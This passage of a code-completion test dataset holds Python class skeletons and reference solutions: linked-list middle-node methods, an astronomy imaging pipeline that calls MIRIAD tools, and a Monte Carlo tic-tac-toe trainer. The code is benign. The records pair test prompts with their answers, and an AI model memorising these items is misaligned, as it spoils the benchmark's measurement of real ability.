\"\"\"快慢指针\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n<|end_body_0|>\n\n<|body_start_1|>\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n<|end_body_1|>\n\n<|body_start_2|>\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000220", "length_bytes": 1920, "license_type": "no_license", "methods": [{"docstring": "数组", "name": "middle_node", "signature": "def middle_node(cls, head: ListNode) -> ListNode"}, {"docstring": "单指针", "name": "middle_node_v2", "signature": "def middle_node_v2(cls, head: ListNode) -> ListNode"}, {"docstring": "快慢指针", "name": "middle_node_v3", "signature": "def middle_node_v3(cls, head: ListNode) -> ListNode"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def middle_node(cls, head: ListNode) -> ListNode: 数组\n- def middle_node_v2(cls, head: ListNode) -> ListNode: 单指针\n- def middle_node_v3(cls, head: ListNode) -> ListNode: 快慢指针", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def middle_node(cls, head: ListNode) -> ListNode: 数组\n- def middle_node_v2(cls, head: ListNode) -> ListNode: 单指针\n- def 
middle_node_v3(cls, head: ListNode) -> ListNode: 快慢指针\n\n<|skeleton|>\nclass Solution:\n\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n <|body_0|>\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n <|body_1|>\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n \"\"\"快慢指针\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n<|end_body_0|>\n\n<|body_start_1|>\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n<|end_body_1|>\n\n<|body_start_2|>\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n<|end_body_2|>\n", "revision_id": "1d1876620a55ff88af7bc390cf1a4fd4350d8d16", "skeleton": "<|skeleton|>\nclass Solution:\n\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n <|body_0|>\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n <|body_1|>\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n \"\"\"快慢指针\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n \"\"\"快慢指针\"\"\"\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n", "source": "the_stack_v2_python_sparse", "source_path": "01-数据结构/链表/876.链表的中间结点.py", "source_repo": "jh-lau/leetcode_in_python", "split": "test", "star_events_count": 0} {"blob_id": "685fd25e3f51e11e3e834eb4a3367c6abae58635", "bodies": ["if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\nelse:\n fname_end = ''\nself.mol = mol\nself.path = './data/' + mol + '/' + mol + fname_end\nself.uvf = fits.open(self.path + '.uvf')\nself.fits = fits.open(self.path + '.fits')\nself.baseline_cutoff = 110\nself.rms = lines[mol]['rms']\nself.restfreq = lines[mol]['restfreq']\n\"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. 
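On the middle-node record beginning above: its three docstrings are Chinese, 数组 meaning "array", 单指针 "single pointer", and 快慢指针 "fast and slow pointers". A standalone sketch of the fast/slow variant, which finds the middle in one pass and O(1) extra space (the ListNode definition and the test list are mine):

class ListNode:
    def __init__(self, val=0, next=None):
        self.val, self.next = val, next

def middle_node(head):
    # The fast pointer advances two steps per iteration, the slow pointer one,
    # so slow sits at the middle (the second of two middles for even lengths)
    # when fast runs off the end.
    fast = slow = head
    while fast and fast.next:
        slow = slow.next
        fast = fast.next.next
    return slow

head = None
for v in (5, 4, 3, 2, 1):      # builds 1 -> 2 -> 3 -> 4 -> 5
    head = ListNode(v, head)
print(middle_node(head).val)   # 3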
They're probably somewhere.\\n \"", "sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\nsp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\nsp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\nsp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\nsp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\nif show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])"], "bodies_text": "<|body_start_0|>\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"\n<|end_body_0|>\n\n<|body_start_1|>\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n<|end_body_1|>\n", "class_docstring": "Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? 
Probably doesn't do too much important stuff.", "class_name": "Observation", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n <|body_0|>\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"\n<|end_body_0|>\n\n<|body_start_1|>\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000221", "length_bytes": 26328, "license_type": "no_license", "methods": [{"docstring": "Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation", "name": "__init__", "signature": "def __init__(self, mol, cut_baselines=True)"}, {"docstring": "Clean and image (if desired) some data. 
Note that this is pulled directly from iorek/jonas/.../tools.py/icr()", "name": "clean", "signature": "def clean(self, show=True)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001698", "prompt": "Implement the Python class `Observation` described below.\n\nClass description:\nMake the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\n\nMethod signatures and docstrings:\n- def __init__(self, mol, cut_baselines=True): Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\n- def clean(self, show=True): Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()", "prompted_full_text": "Implement the Python class `Observation` described below.\n\nClass description:\nMake the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\n\nMethod signatures and docstrings:\n- def __init__(self, mol, cut_baselines=True): Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\n- def clean(self, show=True): Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\n\n<|skeleton|>\nclass Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n <|body_0|>\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. 
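[Annotation] `Observation.__init__` carries its RA/Dec lookup as a bare string literal, so that logic never executes. Restated as real code, with the bare `except:` narrowed, it would look roughly like the sketch below. Whether the coordinates live in HDU 0 (`OBSRA`/`OBSDEC`) or HDU 3 (`RAEPO`/`DECEPO`) depends on how the UVFITS file was exported, which is presumably why the original author kept both paths. The `astropy.io.fits` import is assumed from the record's `fits.open` calls; the helper name is hypothetical.

```python
from astropy.io import fits  # assumed; the record never shows its imports

def read_pointing(uvf_path):
    """Sketch of the disabled RA/Dec block from Observation.__init__."""
    with fits.open(uvf_path) as uvf:
        try:
            # Primary-HDU keywords, as in the record's first branch.
            return uvf[0].data['OBSRA'][0], uvf[0].data['OBSDEC'][0]
        except (KeyError, IndexError):
            # Fallback table HDU, as in the record's second branch.
            return uvf[3].data['RAEPO'][0], uvf[3].data['DECEPO'][0]
```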
They're probably somewhere.\\n \"\n<|end_body_0|>\n\n<|body_start_1|>\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n<|end_body_1|>\n", "revision_id": "f333f97a3d6f913037fa94b4b17ad1f2e5621b05", "skeleton": "<|skeleton|>\nclass Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n <|body_0|>\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. 
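[Annotation] One more wrinkle worth flagging in the same `__init__`: the filename suffix is built from `lines[mol]['baseline_cutoff']`, but the attribute that `clean()` feeds into the uvrange cut is hard-coded to `110`, so the `-short…` name and the actual cut can silently disagree. A one-line hypothetical tightening, assuming the `lines` table is the source of truth:

```python
# Hypothetical: keep the '-short…' filename and the uvrange cut in sync
# (the record hard-codes 110 regardless of lines[mol]['baseline_cutoff']).
self.baseline_cutoff = lines[mol]['baseline_cutoff'] if cut_baselines else 0
```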
It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n", "source": "the_stack_v2_python_sparse", "source_path": "utils.py", "source_repo": "Jonasori/Proplyd-Modeling", "split": "test", "star_events_count": 2} {"blob_id": "2c160e3d78b731a3acb332ccdd3af099038d4c85", "bodies": ["if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\nself.path = path\nself.i_epoch = 0\nself.policy_1 = TabularPolicy()", "self.policy_2 = TabularPolicy()\nreturns = dict()\nfor num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\nfor _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\nfor num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\nself.i_epoch += 1\npickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\nprint('MC prediction finished.')"], "bodies_text": "<|body_start_0|>\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' 
% self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TrainOneRound", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TrainOneRound:\n\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n <|body_0|>\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000222", "length_bytes": 2243, "license_type": "no_license", "methods": [{"docstring": "Input: path: the path to save the policy read_first: if true, read from the path first", "name": "__init__", "signature": "def __init__(self, path, read_first=False)"}, {"docstring": "MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained", "name": "MCPrediction", "signature": "def MCPrediction(self, n_epoch)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003950", "prompt": "Implement the Python class `TrainOneRound` described below.\n\nClass description:\nImplement the TrainOneRound class.\n\nMethod signatures and docstrings:\n- def __init__(self, path, read_first=False): Input: path: the path 
to save the policy read_first: if true, read from the path first\n- def MCPrediction(self, n_epoch): MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained", "prompted_full_text": "Implement the Python class `TrainOneRound` described below.\n\nClass description:\nImplement the TrainOneRound class.\n\nMethod signatures and docstrings:\n- def __init__(self, path, read_first=False): Input: path: the path to save the policy read_first: if true, read from the path first\n- def MCPrediction(self, n_epoch): MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\n\n<|skeleton|>\nclass TrainOneRound:\n\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n <|body_0|>\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n<|end_body_1|>\n", "revision_id": "5831d4c1eaf21d41007eb6988f3c9885b55d13b2", "skeleton": "<|skeleton|>\nclass TrainOneRound:\n\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n <|body_0|>\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TrainOneRound:\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' 
